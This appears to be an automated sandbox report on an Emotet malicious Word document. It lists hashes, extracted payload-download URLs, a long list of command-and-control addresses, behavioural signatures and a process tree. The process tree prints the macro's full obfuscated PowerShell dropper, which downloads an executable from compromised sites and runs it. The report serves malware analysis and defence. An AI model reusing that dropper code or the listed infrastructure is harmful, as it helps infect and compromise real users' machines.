Analysis
-
max time kernel
49s -
max time network
27s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
29-10-2020 16:13
Static task
static1
General
-
Target
emotet_e3_683573224327e8cecc5d38f690c4598f52ece7bd878b05e7f279111680604d5b_2020-10-29__161255577856._doc.doc
-
Size
227KB
-
MD5
9302cda391554ab9cd2a2012057bbd93
-
SHA1
73a9ace74211841912ee09399de898b221e47bf3
-
SHA256
683573224327e8cecc5d38f690c4598f52ece7bd878b05e7f279111680604d5b
-
SHA512
3496a3261ddccd2ebc8c6b4c4451a9adcac348d38112a1fda76ec1c6886ecc0ab92eefbb8db78be5a03463de4b596182adeeaa21e62a0f82348df5e90df8057a
Malware Config
Extracted
https://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
https://homewatchamelia.com/wp-admin/qmK/
https://seramporemunicipality.org/replacement-vin/Ql4R/
https://imperfectdream.com/wp-content/xb2csjPW6/
https://mayxaycafe.net/wp-includes/UxdWFzYQj/
https://420extracts.ca/cgi-bin/Ecv/
https://casinopalacett.com/wp-admin/voZDArg/
Extracted
emotet
Epoch3
152.32.75.74:443
91.121.200.35:8080
159.203.16.11:8080
188.226.165.170:8080
139.59.61.215:443
78.90.78.210:80
179.5.118.12:80
202.29.237.113:8080
5.79.70.250:8080
185.80.172.199:80
47.154.85.229:80
198.20.228.9:8080
85.246.78.192:80
190.212.140.6:80
181.59.59.54:80
115.79.59.157:80
54.38.143.245:8080
42.200.96.63:80
5.12.246.155:80
74.208.173.91:8080
113.203.238.130:80
109.13.179.195:80
2.82.75.215:80
58.94.58.13:80
123.216.134.52:80
139.59.12.63:8080
45.239.204.100:80
187.193.221.143:80
5.2.164.75:80
103.93.220.182:80
73.55.128.120:80
126.126.139.26:443
78.101.224.151:80
50.116.78.109:8080
185.208.226.142:8080
91.83.93.103:443
73.100.19.104:80
188.166.220.180:7080
37.46.129.215:8080
177.130.51.198:80
213.165.178.214:80
223.17.215.76:80
172.193.79.237:80
58.27.215.3:8080
109.99.146.210:8080
46.105.131.68:8080
189.123.103.233:80
110.37.224.243:80
41.185.29.128:8080
192.241.220.183:8080
37.205.9.252:7080
185.142.236.163:443
5.2.246.108:80
190.85.46.52:7080
183.91.3.63:80
200.243.153.66:80
82.78.179.117:443
121.117.147.153:443
36.91.44.183:80
120.51.34.254:80
180.148.4.130:8080
103.229.73.17:8080
162.144.145.58:8080
116.202.10.123:8080
172.96.190.154:8080
117.2.139.117:443
203.153.216.178:7080
91.75.75.46:80
46.32.229.152:8080
153.229.219.1:443
75.127.14.170:8080
203.56.191.129:8080
8.4.9.137:8080
195.201.56.70:8080
192.163.221.191:8080
175.103.38.146:80
143.95.101.72:8080
157.7.164.178:8081
95.76.142.243:80
192.210.217.94:8080
190.55.186.229:80
113.161.148.81:80
197.221.227.78:80
178.33.167.120:8080
60.108.128.186:80
115.79.195.246:80
41.76.213.144:8080
178.254.36.182:8080
190.164.135.81:80
188.80.27.54:80
190.192.39.136:80
109.206.139.119:80
103.80.51.61:8080
2.58.16.86:8080
119.228.75.211:80
79.133.6.236:8080
190.180.65.104:80
190.194.12.132:80
77.74.78.80:443
172.105.78.244:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 540 2564 POwersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/3852-12-0x0000000000510000-0x0000000000522000-memory.dmp emotet behavioral1/memory/3852-13-0x00000000021F0000-0x0000000002200000-memory.dmp emotet behavioral1/memory/3952-16-0x0000000000490000-0x00000000004A2000-memory.dmp emotet behavioral1/memory/3952-17-0x0000000000500000-0x0000000000510000-memory.dmp emotet -
Blacklisted process makes network request 4 IoCs
Processes:
POwersheLL.exeflow pid process 12 540 POwersheLL.exe 14 540 POwersheLL.exe 16 540 POwersheLL.exe 20 540 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
Epl6_wa2m.exepnrpnsp.exepid process 3852 Epl6_wa2m.exe 3952 pnrpnsp.exe -
Drops file in System32 directory 1 IoCs
Processes:
Epl6_wa2m.exedescription ioc process File opened for modification C:\Windows\SysWOW64\D3D12\pnrpnsp.exe Epl6_wa2m.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1084 WINWORD.EXE 1084 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
POwersheLL.exepnrpnsp.exepid process 540 POwersheLL.exe 540 POwersheLL.exe 540 POwersheLL.exe 3952 pnrpnsp.exe 3952 pnrpnsp.exe 3952 pnrpnsp.exe 3952 pnrpnsp.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 540 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
WINWORD.EXEEpl6_wa2m.exepnrpnsp.exepid process 1084 WINWORD.EXE 1084 WINWORD.EXE 1084 WINWORD.EXE 1084 WINWORD.EXE 1084 WINWORD.EXE 1084 WINWORD.EXE 1084 WINWORD.EXE 3852 Epl6_wa2m.exe 3952 pnrpnsp.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
Epl6_wa2m.exedescription pid process target process PID 3852 wrote to memory of 3952 3852 Epl6_wa2m.exe pnrpnsp.exe PID 3852 wrote to memory of 3952 3852 Epl6_wa2m.exe pnrpnsp.exe PID 3852 wrote to memory of 3952 3852 Epl6_wa2m.exe pnrpnsp.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_683573224327e8cecc5d38f690c4598f52ece7bd878b05e7f279111680604d5b_2020-10-29__161255577856._doc.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD     $ 8 P 4 v c u   =     [ t y P e ] ( " { 5 } { 2 } { 0 } { 3 } { 1 } { 4 } "   - f   ' M . i ' , ' O ' , ' y s t e ' , ' O . d I r e c t ' , ' R y ' , ' S ' )     ;     S e T   L s V 0   ( [ t Y p e ] ( " { 5 } { 0 } { 3 } { 1 } { 2 } { 4 } { 6 } "   - F ' . N E ' , ' V ' , ' I c E p ' , ' T . S e R ' , ' o I n T m A n A G ' , ' s Y S T e M ' , ' e r ' )     )   ;     $ R l r k j n w = ( ' Q r ' + ( ' 1 r u ' + ' 9 y ' ) ) ; $ D 7 q z 3 2 b = $ W a 6 r e a 4   +   [ c h a r ] ( 6 4 )   +   $ D e h v 6 7 3 ; $ O 5 a q k 3 g = ( ' X ' + ' a 7 ' + ( ' q 3 h ' + ' 0 ' ) ) ;   ( d I r   ( ' V A R i A b l e : 8 ' + ' P 4 ' + ' V ' + ' c u ' ) ) . v a l u E : : " c r e ` A T e D ` I R e C T ` o R Y " ( $ H O M E   +   ( ( ' { 0 } N s c ' + ( ' s ' + ' 8 r ' ) + ' y { 0 } ' + ( ' S 9 t ' + ' 4 g _ ' ) + ' l ' + ' { ' + ' 0 } ' )   - F   [ C H A r ] 9 2 ) ) ; $ G a 8 f f 5 s = ( ( ' N f f ' + ' e f b ' ) + ' g ' ) ;     $ l S v 0 : : " s E ` c U ` R i t ` y P r o T o C O l "   =   ( ' T ' + ( ' l ' + ' s 1 2 ' ) ) ; $ R u 8 1 8 i i = ( ( ' V ' + ' z v d e n ' ) + ' v ' ) ; $ G 9 p o _ g t   =   ( ' E p ' + ' l ' + ( ' 6 _ w a 2 ' + ' m ' ) ) ; $ Y f w b a 6 6 = ( ( ' T h ' + ' l ' ) + ' i ' + ( ' 7 ' + ' b 3 ' ) ) ; $ I r i o u f u = ( ( ' Y 2 ' + ' 2 ' ) + ' l ' + ( ' 3 ' + ' c t ' ) ) ; $ L l o 6 n _ w = $ H O M E + ( ( ' { ' + ' 0 } N s ' + ' c s 8 r y { 0 ' + ' } S ' + ' 9 ' + ' t 4 g _ l { 0 } ' )   - F   [ C h A R ] 9 2 ) + $ G 9 p o _ g t + ( ' . ' + ( ' e ' + ' x e ' ) ) ; $ J v j d s 4 y = ( ( ' G _ w n ' + ' x ' ) + ' 9 u ' ) ; $ H 5 x r 5 l m = . ( ' n ' + ' e w - o b j e c ' + ' t ' )   n E t . w e b c L I E N t ; $ M m o 4 1 v n = ( ( ( ( ' h ' + ' t t ' + ' p s : ] [   1 )   j j k ' + ' g ' + ' S   ' ) ) + ' [ ' + ( ' ]   ' + ' [ ] ' ) + ( ( ' w ] [   ' + ' 1 )   ' ) ) + ( ' j j k ' + ' g ' ) + ( ' S ' + '   [ ] ' ) + ( '   [ ] ' + ' w ' ) + ( ' e n j ' + ' o y m ' ) + ' y l ' + ' i ' + ( ' f ' + ' e c h e r y ' ) + ( ' l . ' + ' c ' ) + ( ' o ' + ' m ] ' ) + ' [ ' + '   ' + ( ( ' 1 )   ' + ' j ' ) ) + ' j ' + ' k g ' + ( ( ' S ' + '   [ ] ' + '   [ ] w ' + ' w p - i n c l u d ' + ' e s ] ' + ' [   1 )   j j ' + ' k g S ' + '   ' ) ) + ' [ ' + ( ' ] ' + '   [ ' ) + ( ' ] w ' + ' F P ' + ' N x o U i ' ) + ' C ' + ' z ' + ' 3 ' + ' ] ' + ' [   ' + ( ( ' 1 ) ' + '   j ' + ' j k ' ) ) + ( ' g ' + ' S   ' + ' [ ]   [ ' ) + ' ] ' + ' w ' + ' @ ' + ' h t ' + ( ' t p ' + ' s ' ) + ' : ' + ( ' ] [ ' + '   1 ' ) + ( ( ' ) ' + '   j ' ) ) + ( ' j k ' + ' g S   ' ) + ' [ ] ' + ( '   [ ' + ' ] w ] ' ) + ( ' [ ' + '   1 ' ) + ( ( ' )   j ' + ' j k ' ) ) + ' g ' + ( ' S   ' + ' [ ' + ' ]   [ ] ' + ' w h ' ) + ' o m ' + ( ' e ' + ' w a t c ' + ' h a m ' ) + ( ' e l i ' + ' a . ' ) + ' c o ' + ( ' m ] ' + ' [   1 ' ) + ( ( ' )   ' + ' j j k g ' ) ) + ' S ' + ( '   ' + ' [ ]   [ ] w w ' + ' p - ' ) + ' a ' + ' d m ' + ' i ' + ( ' n ' + ' ] [ ' ) + ( ( '   1 ) ' + '   j j k ' + ' g S   [ ' ) ) + ( ' ]   [ ] ' + ' w ' + ' q ' ) + ' m ' + ( ' K ] ' + ' [   ' ) + ( ( ' 1 ) ' + '   j j k g ' + ' S ' + '   ' ) ) + ' [ ] ' + ( '   [ ] ' + ' w @ h t ' ) + ( ( ' t p s : ] [   1 ' + ' ) ' + '   ' ) ) + ( ' j j ' + ' k ' ) + ( ' g ' + ' S   ' ) + ( ' [ ]   ' + ' [ ' ) + ' ] ' + ' w ] ' + ( ' [ ' + '   1 ' ) + ( ( ' )   ' ) ) + ( ' j j k g ' + ' S   [ ' ) + ( ' ]   [ ] ' + ' w s e ' ) + ' r a ' + ( ' m p o ' + ' r ' ) + ' e ' + ' m ' + ( ' u ' + ' n i c i p ' + ' a l ' ) + ( ' i ' + ' t y . ' ) + ( ' o r g ] ' + ' [   ' ) + ' 1 ' + ( ( ' ) ' + '   j j k g ' ) ) + ( ' S   ' + ' [ ]   [ ' ) + ( ' ] ' + ' w ' + ' r e p l a ' ) + ' c ' + ' e m ' + ( ' e ' + ' n t - v i n ] ' ) + ' [   ' + ( ( ' 1 ' + ' )   j j ' ) ) + ( ' k g ' + ' S ' ) + ( '   ' + ' [ ] ' ) + '   [ ' + ' ] ' + ( ' w ' + ' Q l 4 R ] ' + ' [   ' ) + ( ( ' 1 ) ' + '   j j ' ) ) + ' k ' + ' g ' + ( ' S   ' + ' [ ]   ' ) + ( ' [ ' + ' ] w @ ' ) + ' h ' + ' t ' + ( ' t p s : ] ' + ' [ ' ) + ( ( '   1 )   j j ' + ' k ' + ' g S   [ ' + ' ]   [ ' ) ) + ( ( ' ] ' + ' w ] [ ' + '   1 )   ' + ' j j k ' + ' g S ' + '   [ ]   [ ' ) ) + ( ' ] w i m ' + ' p ' + ' e ' ) + ( ' r f e c ' + ' t d ' ) + ( ' r e a ' + ' m . c ' ) + ( ( ' o m ] [   ' + ' 1 )   j j k ' + ' g S   [ ' + ' ]   [ ' ) ) + ' ] ' + ( ' w w ' + ' p - ' ) + ( ' c o ' + ' n t e ' + ' n t ] ' ) + ' [ ' + '   ' + ( ( ' 1 ) ' + '   j j ' ) ) + ( ' k g ' + ' S   [ ] ' ) + ( '   [ ] w ' + ' x ' ) + ( ' b 2 ' + ' c ' ) + ' s j ' + ( ' P ' + ' W 6 ' ) + ' ] [ ' + ( ( '   1 )   ' + ' j j ' ) ) + ' k g ' + ( ' S   [ ' + ' ]   ' ) + ( ' [ ] ' + ' w @ h t ' + ' t p ' ) + ' s : ' + ( ' ] ' + ' [   1 ' ) + ' ) ' + ( '   j ' + ' j k g ' ) + ' S   ' + ( ' [ ]   ' + ' [ ] ' ) + ( ' w ] ' + ' [ ' ) + ( ( '   1 ' + ' )   j j ' + ' k g ' ) ) + ' S   ' + ' [ ] ' + '   [ ' + ( ' ] ' + ' w m a ' ) + ( ' y x a ' + ' y c ' ) + ( ( ' a f e . n ' + ' e t ] [ ' + '   1 )   ' + ' j ' ) ) + ' j ' + ( ' k ' + ' g S ' ) + ( '   [ ] ' + '   ' ) + ( ' [ ] w w ' + ' p - i n c l u ' + ' d e ' ) + ( ( ' s ] ' + ' [   1 )   j j ' + ' k ' ) ) + ( ' g S   ' + ' [ ' ) + ( ' ]   [ ' + ' ] w U ' ) + ( ' x ' + ' d W F ' ) + ( ' z ' + ' Y Q ' ) + ( ' j ] ' + ' [ ' ) + ( ( '   1 )   ' + ' j ' ) ) + ( ' j k g ' + ' S   [ ]   ' + ' [ ] ' ) + ' w @ ' + ' h ' + ' t t ' + ' p ' + ( ' s ' + ' : ] ' ) + ( ( ' [ ' + '   1 )   j ' ) ) + ( ' j ' + ' k g ' ) + ( ' S   [ ' + ' ] ' ) + ( '   [ ' + ' ] w ] ' ) + ( ( ' [   1 )   ' + ' j ' ) ) + ' j ' + ' k ' + ( ' g S   [ ' + ' ] ' + '   [ ] ' + ' w 4 2 0 ' + ' e x t r a ' ) + ( ' c ' + ' t s ' ) + ( ( ' . c a ' + ' ] [ ' + '   1 )   ' ) ) + ( ' j j k ' + ' g ' ) + ( ' S   [ ]   ' + ' [ ] w c ' + ' g ' ) + ( ' i ' + ' - b i ' ) + ( ( ' n ] [ ' + '   ' + ' 1 ) ' ) ) + '   j ' + ' j k ' + ' g ' + ( ' S   ' + ' [ ]   [ ] ' + ' w ' ) + ( ( ' E c v ] [   ' + ' 1 ) ' ) ) + ( '   ' + ' j j ' + ' k g S   ' ) + ( ' [ ]   [ ' + ' ] ' + ' w ' ) + ( ' @ h t t p s ' + ' : ] ' ) + ' [   ' + ( ( ' 1 )   j j ' + ' k g S ' ) ) + '   ' + ' [ ] ' + ( '   ' + ' [ ] w ] ' ) + ' [ ' + '   ' + ( ( ' 1 )   j j ' + ' k ' ) ) + ( ' g S   ' + ' [ ]   [ ' + ' ] w ' ) + ( ' c a ' + ' s ' ) + ( ' i n ' + ' o p ' ) + ( ' a l ' + ' a ' ) + ' c e ' + ( ' t t . ' + ' c o m ] [ ' ) + '   ' + ' 1 ' + ( ( ' ) ' + '   j ' ) ) + ' j ' + ( ' k g ' + ' S   [ ] ' ) + ( '   [ ] ' + ' w w ' ) + ( ' p - ' + ' a d ' + ' m i ' ) + ' n ' + ( ( ' ] [ ' + '   1 )   j ' + ' j ' ) ) + ( ' k g S ' + '   [ ' ) + ( ' ]   ' + ' [ ] w ' ) + ' v ' + ' o ' + ' Z D ' + ' A ' + ( ( ' r ' + ' g ] [   ' + ' 1 )   ' ) ) + ( ' j j ' + ' k ' ) + ' g ' + ( ' S   ' + ' [ ' ) + ( ' ]   ' + ' [ ' ) + ' ] ' + ' w ' ) ) . " r ` E P ` L a c e " ( ( ( ( ' ] [ ' + '   1 ' ) + ( ( ' )   j ' + ' j k g S ' + '   [ ' ) ) + ' ]   ' + ' [ ] ' + ' w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " s P l ` I t " ( $ C h k u t 9 4   +   $ D 7 q z 3 2 b   +   $ O p d k e t n ) ; $ R f 7 k 3 z k = ( ' U ' + ' s ' + ( ' f ' + ' u t h v ' ) ) ; f o r e a c h   ( $ U h b k d 7 k   i n   $ M m o 4 1 v n ) { t r y { $ H 5 x r 5 l m . " d O ` w n l ` O a ` D f I l E " ( $ U h b k d 7 k ,   $ L l o 6 n _ w ) ; $ F s i u 4 _ x = ( ( ' U ' + ' r t ' ) + ( ' d z o ' + ' x ' ) ) ; I f   ( ( . ( ' G e t - I ' + ' t e ' + ' m ' )   $ L l o 6 n _ w ) . " L e n ` G T h "   - g e   4 4 2 6 3 )   { ( [ w m i c l a s s ] ( ' w ' + ( ' i ' + ' n 3 2 ' ) + ( ' _ P ' + ' r ' + ' o c e s s ' ) ) ) . " C r e ` A ` T e " ( $ L l o 6 n _ w ) ; $ Y z r c j r o = ( ( ' T 2 ' + ' a 4 ' ) + ' i ' + ' j n ' ) ; b r e a k ; $ C c w k 5 7 z = ( ' L s ' + ( ' l f h 6 ' + ' p ' ) ) } } c a t c h { } } $ L 9 w t d 0 0 = ( ( ' V ' + ' x b i ' ) + ' w ' + ' x u ' ) 1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exeC:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\D3D12\pnrpnsp.exe"C:\Windows\SysWOW64\D3D12\pnrpnsp.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc1⤵
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exeMD5
77939d1dbf57fb7b4c79d36f45e46080
SHA11d276443f0382b6a6c65cf84624b7bb37c2e1304
SHA256b719f832779494f20eddd4be65384d4c2a026d0ed401057f1563dd9847ab93ba
SHA51263e13a56f9b9377f49a1fb856fea5ec3915fedc4bb3c4eb1945293c7ae79a7c097d9822185fbb7432573383e84c984e94caf857fbf7987f02d0f0e9c4ae0eb13
-
C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exeMD5
77939d1dbf57fb7b4c79d36f45e46080
SHA11d276443f0382b6a6c65cf84624b7bb37c2e1304
SHA256b719f832779494f20eddd4be65384d4c2a026d0ed401057f1563dd9847ab93ba
SHA51263e13a56f9b9377f49a1fb856fea5ec3915fedc4bb3c4eb1945293c7ae79a7c097d9822185fbb7432573383e84c984e94caf857fbf7987f02d0f0e9c4ae0eb13
-
C:\Windows\SysWOW64\D3D12\pnrpnsp.exeMD5
77939d1dbf57fb7b4c79d36f45e46080
SHA11d276443f0382b6a6c65cf84624b7bb37c2e1304
SHA256b719f832779494f20eddd4be65384d4c2a026d0ed401057f1563dd9847ab93ba
SHA51263e13a56f9b9377f49a1fb856fea5ec3915fedc4bb3c4eb1945293c7ae79a7c097d9822185fbb7432573383e84c984e94caf857fbf7987f02d0f0e9c4ae0eb13
-
memory/540-8-0x00000199DB6A0000-0x00000199DB6A1000-memory.dmpFilesize
4KB
-
memory/540-9-0x00000199DBA00000-0x00000199DBA01000-memory.dmpFilesize
4KB
-
memory/540-7-0x00007FFE61390000-0x00007FFE61D7C000-memory.dmpFilesize
9.9MB
-
memory/1084-0-0x000002C0AED40000-0x000002C0AF377000-memory.dmpFilesize
6.2MB
-
memory/1084-5-0x000002C0B7AF0000-0x000002C0B7AF5000-memory.dmpFilesize
20KB
-
memory/3852-12-0x0000000000510000-0x0000000000522000-memory.dmpFilesize
72KB
-
memory/3852-13-0x00000000021F0000-0x0000000002200000-memory.dmpFilesize
64KB
-
memory/3952-14-0x0000000000000000-mapping.dmp
-
memory/3952-16-0x0000000000490000-0x00000000004A2000-memory.dmpFilesize
72KB
-
memory/3952-17-0x0000000000500000-0x0000000000510000-memory.dmpFilesize
64KB